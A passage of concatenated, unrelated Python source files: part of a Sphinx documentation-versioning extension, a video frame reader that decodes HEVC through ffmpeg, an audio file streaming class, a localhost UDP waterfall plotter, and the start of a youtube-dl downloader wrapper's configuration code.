if app.config.html_last_updated_fmt is not None: file_path = app.env.doc2path(pagename) if os.path.isfile(file_path): lufmt = app.config.html_last_updated_fmt or getattr(locale, '_')('%b %d, %Y') mtime = datetime.datetime.fromtimestamp(os.path.getmtime(file_path)) context['last_updated'] = format_date(lufmt, mtime, language=app.config.language, warn=app.warn) def setup(app): """Called by Sphinx during phase 0 (initialization). :param sphinx.application.Sphinx app: Sphinx application object. :returns: Extension version. :rtype: dict """ # Used internally. For rebuilding all pages when one or versions fail. app.add_config_value('sphinxcontrib_versioning_versions', SC_VERSIONING_VERSIONS, 'html') # Needed for banner. app.config.html_static_path.append(STATIC_DIR) app.add_stylesheet('banner.css') # Tell Sphinx which config values can be set by the user. for name, default in Config(): app.add_config_value('scv_{}'.format(name), default, 'html') # Event handlers. app.connect('builder-inited', EventHandlers.builder_inited) app.connect('env-updated', EventHandlers.env_updated) app.connect('html-page-context', EventHandlers.html_page_context) return dict(version=__version__) class ConfigInject(SphinxConfig): """Inject this extension info self.extensions. Append after user's extensions.""" def __init__(self, dirname, filename, overrides, tags): """Constructor.""" super(ConfigInject, self).__init__(dirname, filename, overrides, tags) self.extensions.append('sphinxcontrib.versioning.sphinx_') def _build(argv, config, versions, current_name, is_root): """Build Sphinx docs via multiprocessing for isolation. :param tuple argv: Arguments to pass to Sphinx. :param sphinxcontrib.versioning.lib.Config config: Runtime configuration. :param sphinxcontrib.versioning.versions.Versions versions: Versions class instance. :param str current_name: The ref name of the current version being built. :param bool is_root: Is this build in the web root? """ # Patch. 
application.Config = ConfigInject if config.show_banner: EventHandlers.BANNER_GREATEST_TAG = config.banner_greatest_tag EventHandlers.BANNER_MAIN_VERSION = config.banner_main_ref EventHandlers.BANNER_RECENT_TAG = config.banner_recent_tag EventHandlers.SHOW_BANNER = True EventHandlers.CURRENT_VERSION = current_name EventHandlers.IS_ROOT = is_root EventHandlers.VERSIONS = versions SC_VERSIONING_VERSIONS[:] = [p for r in versions.remotes for p in sorted(r.items()) if p[0] not in ('sha', 'date')] # Update argv. if config.verbose > 1: argv += ('-v',) * (config.verbose - 1) if config.no_colors: argv += ('-N',) if config.overflow: argv += config.overflow # Build. result = build_main(argv) if result != 0: raise SphinxError def _read_config(argv, config, current_name, queue): """Read the Sphinx config via multiprocessing for isolation. :param tuple argv: Arguments to pass to Sphinx. :param sphinxcontrib.versioning.lib.Config config: Runtime configuration. :param str current_name: The ref name of the current version being built. :param multiprocessing.queues.Queue queue: Communication channel to parent process. """ # Patch. EventHandlers.ABORT_AFTER_READ = queue # Run. _build(argv, config, Versions(list()), current_name, False) def build(source, target, versions, current_name, is_root): """Build Sphinx docs for one version. Includes Versions class instance with names/urls in the HTML context. :raise HandledError: If sphinx-build fails. Will be logged before raising. :param str source: Source directory to pass to sphinx-build. :param str target: Destination directory to write documentation to (passed to sphinx-build). :param sphinxcontrib.versioning.versions.Versions versions: Versions class instance. :param str current_name: The ref name of the current version being built. :param bool is_root: Is this build in the web root? 
""" log = logging.getLogger(__name__) argv = ('sphinx-build', source, target) config = Config.from_context() log.debug('Running sphinx-build for %s with args: %s', current_name, str(argv)) child = multiprocessing.Process(target=_build, args=(argv, config, versions, current_name, is_root)) child.start() child.join() # Block. if child.exitcode != 0: log.error('sphinx-build failed for branch/tag: %s', current_name) raise HandledError def read_config(source, current_name): """Read the Sphinx config for one version. :raise HandledError: If sphinx-build fails. Will be logged before raising. :param str source: Source directory to pass to sphinx-build. :param str current_name: The ref name of the current version being built. :return: Specific Sphinx config values. :rtype: dict """ log = logging.getLogger(__name__) queue = multiprocessing.Queue() config = Config.from_context() with TempDir() as temp_dir: argv = ('sphinx-build', source, temp_dir) log.debug('Running sphinx-build for config values with args: %s', str(argv)) child = multiprocessing.Process(target=_read_config, args=(argv, config, current_name, queue)) child.start() child.join() # Block. if child.exitcode != 0: log.error('sphinx-build failed for branch/tag while reading config: %s', current_name) raise HandledError config = queue.get() return config
framereader.py
# pylint: skip-file import json import os import pickle import queue import struct import subprocess import tempfile import threading from functools import wraps import numpy as np from enum import IntEnum from lru import LRU import _io from tools.lib.cache import cache_path_for_file_path from tools.lib.exceptions import DataUnreadableError from tools.lib.file_helpers import atomic_write_in_dir try: from xx.chffr.lib.filereader import FileReader except ImportError: from tools.lib.filereader import FileReader HEVC_SLICE_B = 0 HEVC_SLICE_P = 1 HEVC_SLICE_I = 2 class GOPReader: def get_gop(self, num): # returns (start_frame_num, num_frames, frames_to_skip, gop_data) raise NotImplementedError class DoNothingContextManager: def __enter__(self): return self def __exit__(self, *x): pass class FrameType(IntEnum): raw = 1 h265_stream = 2 def fingerprint_video(fn): with FileReader(fn) as f: header = f.read(4) if len(header) == 0: raise DataUnreadableError("%s is empty" % fn) elif header == b"\x00\xc0\x12\x00": return FrameType.raw elif header == b"\x00\x00\x00\x01": if 'hevc' in fn: return FrameType.h265_stream else: raise NotImplementedError(fn) else: raise NotImplementedError(fn) def ffprobe(fn, fmt=None): cmd = ["ffprobe", "-v", "quiet", "-print_format", "json", "-show_format", "-show_streams"] if fmt: cmd += ["-f", fmt] cmd += [fn] try: ffprobe_output = subprocess.check_output(cmd) except subprocess.CalledProcessError: raise DataUnreadableError(fn) return json.loads(ffprobe_output) def vidindex(fn, typ): vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex") vidindex = os.path.join(vidindex_dir, "vidindex") subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null", "w")) with tempfile.NamedTemporaryFile() as prefix_f, \ tempfile.NamedTemporaryFile() as index_f: try: subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name]) except subprocess.CalledProcessError: raise DataUnreadableError("vidindex failed on file 
%s" % fn) with open(index_f.name, "rb") as f: index = f.read() with open(prefix_f.name, "rb") as f: prefix = f.read() index = np.frombuffer(index, np.uint32).reshape(-1, 2) assert index[-1, 0] == 0xFFFFFFFF assert index[-1, 1] == os.path.getsize(fn) return index, prefix def cache_fn(func): @wraps(func) def cache_inner(fn, *args, **kwargs): if kwargs.pop('no_cache', None): cache_path = None else: cache_prefix = kwargs.pop('cache_prefix', None) cache_path = cache_path_for_file_path(fn, cache_prefix) if cache_path and os.path.exists(cache_path): with open(cache_path, "rb") as cache_file: cache_value = pickle.load(cache_file) else: cache_value = func(fn, *args, **kwargs) if cache_path: with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file: pickle.dump(cache_value, cache_file, -1) return cache_value return cache_inner @cache_fn def index_stream(fn, typ): assert typ in ("hevc", ) with FileReader(fn) as f: assert os.path.exists(f.name), fn index, prefix = vidindex(f.name, typ) probe = ffprobe(f.name, typ) return { 'index': index, 'global_prefix': prefix, 'probe': probe } def index_videos(camera_paths, cache_prefix=None): """Requires that paths in camera_paths are contiguous and of the same type.""" if len(camera_paths) < 1: raise ValueError("must provide at least one video to index") frame_type = fingerprint_video(camera_paths[0]) for fn in camera_paths: index_video(fn, frame_type, cache_prefix) def index_video(fn, frame_type=None, cache_prefix=None): cache_path = cache_path_for_file_path(fn, cache_prefix) if os.path.exists(cache_path): return if frame_type is None: frame_type = fingerprint_video(fn[0]) if frame_type == FrameType.h265_stream: index_stream(fn, "hevc", cache_prefix=cache_prefix) else: raise NotImplementedError("Only h265 supported") def get_video_index(fn, frame_type, cache_prefix=None): cache_path = cache_path_for_file_path(fn, cache_prefix) if not os.path.exists(cache_path): index_video(fn, frame_type, cache_prefix) if not 
os.path.exists(cache_path): return None with open(cache_path, "rb") as cache_file: return pickle.load(cache_file) def read_file_check_size(f, sz, cookie): buff = bytearray(sz) bytes_read = f.readinto(buff) assert bytes_read == sz, (bytes_read, sz) return buff def rgb24toyuv420(rgb): yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ], [-0.14714119, -0.28886916, 0.43601035 ], [ 0.61497538, -0.51496512, -0.10001026 ]]) img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape) y_len = img.shape[0] * img.shape[1] uv_len = y_len / 4 ys = img[:, :, 0] us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128 vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128 yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype) yuv420[:y_len] = ys.reshape(-1) yuv420[y_len:y_len + uv_len] = us.reshape(-1) yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1) return yuv420.clip(0, 255).astype('uint8') def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt): # using a tempfile is much faster than proc.communicate for some reason with tempfile.TemporaryFile() as tmpf: tmpf.write(rawdat) tmpf.seek(0) threads = os.getenv("FFMPEG_THREADS", "0") cuda = os.getenv("FFMPEG_CUDA", "0") == "1" proc = subprocess.Popen( ["ffmpeg", "-threads", threads, "-hwaccel", "none" if not cuda else "cuda", "-c:v", "hevc", "-vsync", "0", "-f", vid_fmt, "-flags2", "showall", "-i", "pipe:0", "-threads", threads, "-f", "rawvideo", "-pix_fmt", pix_fmt, "pipe:1"], stdin=tmpf, stdout=subprocess.PIPE, stderr=open("/dev/null")) # dat = proc.communicate()[0] dat = proc.stdout.read() if proc.wait() != 0: raise DataUnreadableError("ffmpeg failed") if pix_fmt == "rgb24": ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3) elif pix_fmt == "yuv420p": ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2)) elif pix_fmt == "yuv444p": ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w) else: raise 
NotImplementedError

  return ret


class BaseFrameReader:
  """Abstract frame-reader interface; usable as a context manager (close on exit)."""
  # properties: frame_type, frame_count, w, h

  def __enter__(self):
    return self

  def __exit__(self, *args):
    self.close()

  def close(self):
    pass

  def get(self, num, count=1, pix_fmt="yuv420p"):
    raise NotImplementedError


def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, index_data=None):
  """Factory: fingerprint the video at `fn` and return a matching reader."""
  frame_type = fingerprint_video(fn)
  if frame_type == FrameType.raw:
    return RawFrameReader(fn)
  elif frame_type in (FrameType.h265_stream,):
    if not index_data:
      # build (or fetch cached) per-frame index for the h265 stream
      index_data = get_video_index(fn, frame_type, cache_prefix)
    return StreamFrameReader(fn, frame_type, index_data, readahead=readahead, readbehind=readbehind)
  else:
    raise NotImplementedError(frame_type)


class RawData:
  """Random access over fixed-size records, each prefixed by a 4-byte little/native 'I' length."""

  def __init__(self, f):
    self.f = _io.FileIO(f, 'rb')
    # payload size read from the first record's length prefix;
    # assumes every record in the file has the same length
    self.lenn = struct.unpack("I", self.f.read(4))[0]
    # NOTE(review): true division makes this a float; an integer count (//)
    # looks intended — confirm callers tolerate the float.
    self.count = os.path.getsize(f) / (self.lenn+4)

  def read(self, i):
    # seek past i full records plus record i's own 4-byte prefix
    self.f.seek((self.lenn+4)*i + 4)
    return self.f.read(self.lenn)


class RawFrameReader(BaseFrameReader):
  """Reader for raw (bayer) camera dumps; debayers to RGB/YUV on demand."""

  def __init__(self, fn):
    # raw camera
    self.fn = fn
    self.frame_type = FrameType.raw
    self.rawfile = RawData(self.fn)
    self.frame_count = self.rawfile.count
    # output dimensions after 2x2 debayer of the 1280x960 sensor data
    self.w, self.h = 640, 480

  def load_and_debayer(self, img):
    """Debayer one raw frame buffer into an HxWx3 uint8 image."""
    img = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
    # naive 2x2 demosaic: take one red/blue sample, average the two greens
    cimg = np.dstack([img[0::2, 1::2], ((img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16")) >> 1).astype("uint8"), img[1::2, 0::2]])
    return cimg

  def get(self, num, count=1, pix_fmt="yuv420p"):
    """Return `count` frames starting at `num` in the requested pixel format."""
    assert self.frame_count is not None
    assert num+count <= self.frame_count

    if pix_fmt not in ("yuv420p", "rgb24"):
      raise ValueError("Unsupported pixel format %r" % pix_fmt)

    app = []
    for i in range(num, num+count):
      dat = self.rawfile.read(i)
      rgb_dat = self.load_and_debayer(dat)
      if pix_fmt == "rgb24":
        app.append(rgb_dat)
      elif pix_fmt == "yuv420p":
        app.append(rgb24toyuv420(rgb_dat))
      else:
        raise NotImplementedError

    return app


class VideoStreamDecompressor:
  """Feeds a compressed stream to an ffmpeg subprocess and yields raw decoded frames.

  write() pushes compressed data to ffmpeg's stdin; a daemon thread drains
  stdout in fixed-size frame chunks into out_q; read() pops one frame.
  """

  def __init__(self, vid_fmt, w, h, pix_fmt):
    self.vid_fmt = vid_fmt
    self.w = w
    self.h = h
    self.pix_fmt = pix_fmt

    # bytes per decoded frame, fixed by the output pixel format
    if pix_fmt == "yuv420p":
      self.out_size = w*h*3//2  # yuv420p
    elif pix_fmt in ("rgb24", "yuv444p"):
      self.out_size = w*h*3
    else:
      raise NotImplementedError

    self.out_q = queue.Queue()

    threads = os.getenv("FFMPEG_THREADS", "0")
    cuda = os.getenv("FFMPEG_CUDA", "0") == "1"
    # NOTE(review): the /dev/null handle opened for stderr is never closed
    # explicitly (fd lives until process GC) — confirm acceptable.
    self.proc = subprocess.Popen(
      ["ffmpeg",
       "-threads", threads,
       "-hwaccel", "none" if not cuda else "cuda",
       "-c:v", "hevc",
       # "-avioflags", "direct",
       "-analyzeduration", "0",
       "-probesize", "32",
       "-flush_packets", "0",
       # "-fflags", "nobuffer",
       "-vsync", "0",
       "-f", vid_fmt,
       "-i", "pipe:0",
       "-threads", threads,
       "-f", "rawvideo",
       "-pix_fmt", pix_fmt,
       "pipe:1"],
      stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))

    def read_thread():
      # drain decoded frames from ffmpeg stdout until EOF
      while True:
        r = self.proc.stdout.read(self.out_size)
        if len(r) == 0:
          break
        assert len(r) == self.out_size
        self.out_q.put(r)

    self.t = threading.Thread(target=read_thread)
    self.t.daemon = True
    self.t.start()

  def __enter__(self):
    return self

  def __exit__(self, *args):
    self.close()

  def write(self, rawdat):
    self.proc.stdin.write(rawdat)
    self.proc.stdin.flush()

  def read(self):
    """Block until one decoded frame is available; return it as a numpy array."""
    dat = self.out_q.get(block=True)
    if self.pix_fmt == "rgb24":
      ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
    elif self.pix_fmt == "yuv420p":
      # planar 4:2:0 is returned flat (h*w*3//2 bytes); caller reshapes if needed
      ret = np.frombuffer(dat, dtype=np.uint8)
    elif self.pix_fmt == "yuv444p":
      ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
    else:
      assert False
    return ret

  def eos(self):
    # signal end-of-stream: closing stdin lets ffmpeg flush and exit
    self.proc.stdin.close()

  def close(self):
    self.proc.stdin.close()
    self.t.join()
    # NOTE(review): wait() is called twice (second inside an assert, stripped
    # under -O); the duplicate is harmless but looks unintentional.
    self.proc.wait()
    assert self.proc.wait() == 0


class StreamGOPReader(GOPReader):
  """GOP lookup over an indexed h265 stream: maps a frame number to the raw
  byte range of its group-of-pictures, prepending the stream's global prefix."""

  def __init__(self, fn, frame_type, index_data):
    assert frame_type == FrameType.h265_stream

    self.fn = fn
    self.frame_type = frame_type
    self.frame_count = None
    self.w, self.h = None, None

    self.prefix = None
    self.index = None

    # index rows: [slice_type, byte_offset]; global_prefix holds stream headers
    self.index = index_data['index']
    self.prefix = index_data['global_prefix']
    probe = index_data['probe']

    self.prefix_frame_data = None
    self.num_prefix_frames = 0
    self.vid_fmt = "hevc"

    # find the first I-frame; the stream is expected to start on one
    i = 0
    while i < self.index.shape[0] and self.index[i, 0] != HEVC_SLICE_I:
      i += 1
    self.first_iframe = i
    assert self.first_iframe == 0

    # last index row is a sentinel (end offset), not a frame
    self.frame_count = len(self.index) - 1

    self.w = probe['streams'][0]['width']
    self.h = probe['streams'][0]['height']

  def _lookup_gop(self, num):
    """Return (frame_b, frame_e, offset_b, offset_e): the GOP containing `num`."""
    # walk back to the I-frame opening this GOP
    frame_b = num
    while frame_b > 0 and self.index[frame_b, 0] != HEVC_SLICE_I:
      frame_b -= 1
    # walk forward to the next I-frame (exclusive end)
    frame_e = num + 1
    while frame_e < (len(self.index) - 1) and self.index[frame_e, 0] != HEVC_SLICE_I:
      frame_e += 1
    offset_b = self.index[frame_b, 1]
    offset_e = self.index[frame_e, 1]
    return (frame_b, frame_e, offset_b, offset_e)

  def get_gop(self, num):
    """Read the raw bytes of the GOP containing frame `num`.

    Returns (frame_b, num_frames, skip_frames, rawdat) where rawdat already
    includes the global stream prefix.
    """
    frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
    assert frame_b <= num < frame_e
    num_frames = frame_e - frame_b
    with FileReader(self.fn) as f:
      f.seek(offset_b)
      rawdat = f.read(offset_e - offset_b)
      if num < self.first_iframe:
        assert self.prefix_frame_data
        rawdat = self.prefix_frame_data + rawdat
      rawdat = self.prefix + rawdat
    # frames decoded only to prime the decoder get skipped by the caller
    skip_frames = 0
    if num < self.first_iframe:
      skip_frames = self.num_prefix_frames
    return frame_b, num_frames, skip_frames, rawdat


class GOPFrameReader(BaseFrameReader):
  #FrameReader with caching and readahead for formats that are group-of-picture based

  def __init__(self, readahead=False, readbehind=False):
    self.open_ = True
    self.readahead = readahead
    self.readbehind = readbehind
    # (frame_num, pix_fmt) -> decoded frame, bounded LRU
    self.frame_cache = LRU(64)

    if self.readahead:
      self.cache_lock = threading.RLock()
      self.readahead_last = None
      self.readahead_len = 30
      self.readahead_c = threading.Condition()
      self.readahead_thread = threading.Thread(target=self._readahead_thread)
      self.readahead_thread.daemon = True
      self.readahead_thread.start()
    else:
      self.cache_lock = DoNothingContextManager()

  def close(self):
    if not self.open_:
      return
    self.open_ = False

    if self.readahead:
      # wake the readahead thread so it can observe open_ == False and exit
      self.readahead_c.acquire()
      self.readahead_c.notify()
      self.readahead_c.release()
      self.readahead_thread.join()

  def _readahead_thread(self):
    """Background prefetcher: on each wakeup, warm the cache around the last get()."""
    while True:
      self.readahead_c.acquire()
      try:
        if not self.open_:
          break
        self.readahead_c.wait()
      finally:
        self.readahead_c.release()
      if not self.open_:
        break
      assert self.readahead_last
      num, pix_fmt = self.readahead_last

      if self.readbehind:
        # prefetch backwards from the cursor (useful for reverse scrubbing)
        for k in range(num - 1, max(0, num - self.readahead_len), -1):
          self._get_one(k, pix_fmt)
      else:
        for k in range(num, min(self.frame_count, num + self.readahead_len)):
          self._get_one(k, pix_fmt)

  def _get_one(self, num, pix_fmt):
    """Return frame `num`, decoding (and caching) its whole GOP on a miss."""
    assert num < self.frame_count

    # fast path without the lock; re-checked under the lock below
    if (num, pix_fmt) in self.frame_cache:
      return self.frame_cache[(num, pix_fmt)]

    with self.cache_lock:
      if (num, pix_fmt) in self.frame_cache:
        return self.frame_cache[(num, pix_fmt)]

      frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)

      ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt)
      # drop decoder-priming frames that precede the requested GOP
      ret = ret[skip_frames:]
      assert ret.shape[0] == num_frames

      # cache every frame of the GOP, not just the requested one
      for i in range(ret.shape[0]):
        self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]

      return self.frame_cache[(num, pix_fmt)]

  def get(self, num, count=1, pix_fmt="yuv420p"):
    """Return `count` consecutive frames starting at `num`; kicks the prefetcher."""
    assert self.frame_count is not None

    if num + count > self.frame_count:
      raise ValueError("{} > {}".format(num + count, self.frame_count))

    if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
      raise ValueError("Unsupported pixel format %r" % pix_fmt)

    ret = [self._get_one(num + i, pix_fmt) for i in range(count)]

    if self.readahead:
      self.readahead_last = (num+count, pix_fmt)
      self.readahead_c.acquire()
      self.readahead_c.notify()
      self.readahead_c.release()

    return ret


class StreamFrameReader(StreamGOPReader, GOPFrameReader):
  """Concrete h265 stream reader: GOP lookup + caching/readahead front-end."""

  def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False):
    StreamGOPReader.__init__(self, fn, frame_type, index_data)
    GOPFrameReader.__init__(self, readahead, readbehind)


def GOPFrameIterator(gop_reader, pix_fmt):
  """Yield every frame of `gop_reader` in order, keeping a few GOPs in flight
  through the stream decompressor for pipelining."""
  # this is really ugly. ill think about how to refactor it when i can think good

  IN_FLIGHT_GOPS = 6  # should be enough that the stream decompressor starts returning data

  with VideoStreamDecompressor(gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt) as dec:
    # queue of [frames_still_to_skip, frames_still_to_yield] per submitted GOP
    read_work = []

    def readthing():
      # print read_work, dec.out_q.qsize()
      # consume one decoded frame: either discard it (skip counter) or yield it
      outf = dec.read()
      read_thing = read_work[0]
      if read_thing[0] > 0:
        read_thing[0] -= 1
      else:
        assert read_thing[1] > 0
        yield outf
        read_thing[1] -= 1
      if read_thing[1] == 0:
        read_work.pop(0)

    i = 0
    while i < gop_reader.frame_count:
      frame_b, num_frames, skip_frames, gop_data = gop_reader.get_gop(i)
      dec.write(gop_data)
      i += num_frames
      read_work.append([skip_frames, num_frames])

      # apply backpressure: drain frames once enough GOPs are queued
      while len(read_work) >= IN_FLIGHT_GOPS:
        for v in readthing():
          yield v

    dec.eos()
    # flush whatever is still in flight after end-of-stream
    while read_work:
      for v in readthing():
        yield v


def FrameIterator(fn, pix_fmt, **kwargs):
  """Iterate all frames of `fn`, using the pipelined GOP path when available."""
  fr = FrameReader(fn, **kwargs)
  if isinstance(fr, GOPReader):
    for v in GOPFrameIterator(fr, pix_fmt):
      yield v
  else:
    for i in range(fr.frame_count):
      yield fr.get(i, pix_fmt=pix_fmt)[0]
input_file_stream.py
"""Load an audio file into memory and play its contents. NumPy and the soundfile module (https://PySoundFile.readthedocs.io/) must be installed for this to work. This example program loads the whole file into memory before starting playback. To play very long files, you should use play_long_file.py instead. """ import sounddevice as sd import soundfile as sf import numpy as np import time import utils.helpers as utils from typing import Callable, Optional from threading import Thread, Event from utils.circular_buffer import CircularBuffer # TODO: handle wrapping of file class InputFileStream(object): def __init__(self, filename, block_size=512, callback: Callable = utils.empty_func): self.filename = filename self.block_size = block_size self.callback = callback self.file = sf.SoundFile(filename) self.sample_rate = self.file.samplerate self.channels = self.file.channels self.latency = self.block_size / self.sample_rate self.start_event = Event() self.blocks_received = 0 self._stop = False def start(self): self._stop = False self.start_event.clear() self.thread = Thread(target=self._stream_file) self.thread.start() print("WAITING") self.start_event.wait() def stop(self): self._stop = True def abort(self): self._stop = True def _stream_file(self): """THREAD: Imitates real time audio stream but from file""" time_per_loop = (self.block_size / self.sample_rate) extra_time_slept = 0 while not self._stop: start = time.perf_counter() # process the audio block = self.file.read(frames=self.block_size, dtype='float32') num_frames = np.shape(block)[0] # handle mono if block.ndim == 1: block = np.expand_dims(block, axis=1) # handle end of file if num_frames < self.block_size: new_block = np.zeros((self.block_size, block.shape[1]), dtype=np.float32) new_block[:num_frames] = block block = new_block self.file.seek(0) self.blocks_received += num_frames self.callback(block, num_frames) # compute processing time end_compute = time.perf_counter() elapsed_compute = end_compute - start # 
print(f"input process time: {elapsed_compute}") # sleep for remaining time at given sample rate sleep_time = time_per_loop - elapsed_compute - extra_time_slept # print(f"Sleep time: {sleep_time}") time.sleep(max(0, sleep_time)) # signal first block done if self.blocks_received <= self.block_size and self.blocks_received > 0: self.start_event.set() # record any excess time spent sleeping to remove in the next loop end_sleep = time.perf_counter() elapsed_sleep = end_sleep - end_compute extra_time_slept = elapsed_sleep - sleep_time
pyPeekUDP.py
# === Start Python 2/3 compatibility from __future__ import absolute_import, division, print_function, unicode_literals from future.builtins import * # noqa pylint: disable=W0401, W0614 from future.builtins.disabled import * # noqa pylint: disable=W0401, W0614 # === End Python 2/3 compatibility from future import standard_library standard_library.install_aliases() import time import threading import socket import numpy as np import matplotlib.pyplot as plt import matplotlib.animation as animation UDP_IP = "127.0.0.1" UDP_PORT = 2054 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind((UDP_IP, UDP_PORT)) length = 1024 freqs = 1024 times = 128 integration = 128 waterfall = np.zeros((freqs // 4, times), dtype=np.float32) """ idx=0 while True: idx=(idx+1)%times print(idx) for i in np.arange(integration): data, addr = sock.recvfrom(length) d=np.fromstring(data,dtype=np.int8) waterfall[:,idx]+=d """ def updatefig(*args): global waterfall p.set_data(waterfall) return (p,) def data_listener(): idx = 0 debuf = False while True: idx = (idx + 1) % times for i in np.arange(integration): data, addr = sock.recvfrom(length) d = np.fromstring(data, dtype=np.int8) waterfall[:, idx] += d.reshape(-1, 4).mean(axis=1) thread = threading.Thread(target=data_listener) thread.daemon = True thread.start() f, ax = plt.subplots() plt.ioff() p = ax.imshow(waterfall, aspect="auto", animated=True) ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100) f.show()
downloader.py
#!/usr/bin/python3
# Updated On 22/08/2021
# Created By ybenel
"""
Important Notes:
External Downloader And its args do only work in specific video formats
In platforms like (youtube) Unfortunately It doesn't work on PH And Other Sites.
"""
from __future__ import unicode_literals
from .banner import *
import os,sys,json,itertools,threading,shutil,configparser,optparse
from time import sleep as sl
from random import shuffle,randint
from .colors import get_colors
from distutils import util,spawn
try:
    import validators as valid
    import youtube_dl as dl
    import requests as req
    # ffmpeg binary is mandatory for all post-processing
    if spawn.find_executable('ffmpeg'):
        pass
    else:
        print("[!] 'ffmpeg' Is Required ! ");sys.exit(0)
except ImportError:
    print("[!] Modules ['requests','youtube_dl','validators'] Are Not Installed ! ")
    print("[+] Install Them To Get This Tool To Work ")
    sys.exit(0)

# global
# Module-level mutable state shared by the classes below.
platform = sys.platform
user = os.environ.get('USER')
default_conf = []     # values loaded from config.rc, in a fixed positional order
directory = []        # [0] = destination directory for the finished file
titlez = []           # [0] = title of the media being downloaded
playlist_link = []    # normalized URL when a playlist link was given
extension = []        # [0] = expected output file extension
cf_path = ("/home/%s/.config/PrNdOwN/"%(user))

# Config Parser
class config_reader():
    # Locate config.rc (cwd on Windows, cwd then ~/.config/PrNdOwN on Linux)
    # and load it into default_conf.
    def find_config(filename='config.rc'):
        if platform in ['win64','win32'] and os.path.isfile(filename) == True:
            config_reader.read_config(filename)
        elif platform == 'linux':
            if os.path.isfile(filename) == True:
                config_reader.read_config(filename)
            elif os.path.isfile('%s%s'%(cf_path,filename)) == True:
                config_reader.read_config(('%s%s'%(cf_path,filename)))
            else:
                print("[!] Config Not Found !");exit(1)
        else:
            config_reader.read_config(filename)

    # Parse the [DEFAULT] section and append the values to default_conf in the
    # positional order that runner() reads them back.
    def read_config(filename):
        try:
            config = configparser.ConfigParser()
            config.read(filename)
            prev_loc = config['DEFAULT']['Prevered_location']
            vid_qual = config['DEFAULT']['Video_quality']
            vid_qual2 = vid_qual
            sound_qual = config['DEFAULT']['Sound_quality']
            extr = config['DEFAULT']['Extract_audio']
            qta = config['DEFAULT']['Quiet']
            Playlist = config['DEFAULT']['Playlist']
            aria2c = config['DEFAULT']['Aria2c']
            external = config['DEFAULT']['External']
            external_args = config['DEFAULT']['External_args']
            proxy = config['DEFAULT']['Proxy']
            geobypass = config['DEFAULT']['Geobypass']
            vid_Aud = config['DEFAULT']['Formats'];vid_Aud = list(vid_Aud.split(" "))
            Aud_bit = config['DEFAULT']['Audio_Bit']
            thumbnail = config['DEFAULT']['Thumbnail']
            # convert the yes/no style strings into real booleans
            sound_qual = bool(util.strtobool(sound_qual))
            extr = bool(util.strtobool(extr))
            qta = bool(util.strtobool(qta))
            Playlist = bool(util.strtobool(Playlist))
            aria2c = bool(util.strtobool(aria2c))
            geoby = bool(util.strtobool(geobypass))
            default_conf.extend([prev_loc,vid_qual,vid_qual2,sound_qual,extr,qta,Playlist,aria2c,external,external_args,proxy,vid_Aud,Aud_bit,geoby,thumbnail])
        except KeyError:
            # missing keys: silently leave default_conf unpopulated
            return

# Parser All Arguments To Config Then Download
class parser_args():
    # Positional bundle of every download option; indices 0..15 are required.
    def __init__(self,*args):
        self.type = args[0]                       # 'Audio' or 'Video' config key
        self.link = args[1]
        self.format = args[2]                     # youtube-dl format selector
        self.audio_format = args[3] or 'mp3'
        self.video_format = args[4] or 'mp4'
        self.video_bitrate = args[5] or '320'
        self.playlist = args[6] or False
        self.external_downloader = args[7]
        self.external_downloader_args = args[8]
        self.username = args[9] or ''
        self.password = args[10] or ''
        self.twofactor = args[11] or ''
        self.videopassword = args[12] or ''
        self.proxy = args[13] or ''
        self.geobypass = args[14] or False
        self.thumbnail = args[15] or False

    # Fold the collected options into the youtube-dl option dict and download.
    def add_values(self):
        config = download.get_config()
        # snapshot used to retry with 'bestvideo+bestaudio/best' on format errors
        incase_of_error = {'Type': self.type,'AFormat': self.audio_format,'VFormat': self.video_format,'VBitrate': self.video_bitrate,'Playlist': self.playlist,'SExternal': self.external_downloader,'SExternalD': self.external_downloader_args,'User': self.username,'Pass': self.password,'TFactor': self.twofactor, 'VPass': self.videopassword, 'Proxy': self.proxy, 'GeoBy': self.geobypass}
        config[self.type]['format'] = self.format
        if self.type == "Audio":
            # only the first postprocessor (FFmpegExtractAudio) is patched
            for x in config[self.type]['postprocessors']:
                x['preferredcodec'] = self.audio_format;x['preferredquality'] = self.video_bitrate
                break
        config[self.type]['preferedformat'] = self.video_format
        if self.playlist == "True":
            config[self.type]['noplaylist'] = False
        if self.thumbnail == "False":
            config[self.type]['writethumbnail'] = False
        if str(self.external_downloader) != "None":
            config[self.type]['external_downloader'] = self.external_downloader
        if str(self.external_downloader_args) != "None":
            config[self.type]['external_downloader_args'] = self.external_downloader_args
        if self.username != '':
            config[self.type]['username'] = self.username
        if self.password != '':
            config[self.type]['password'] = self.password
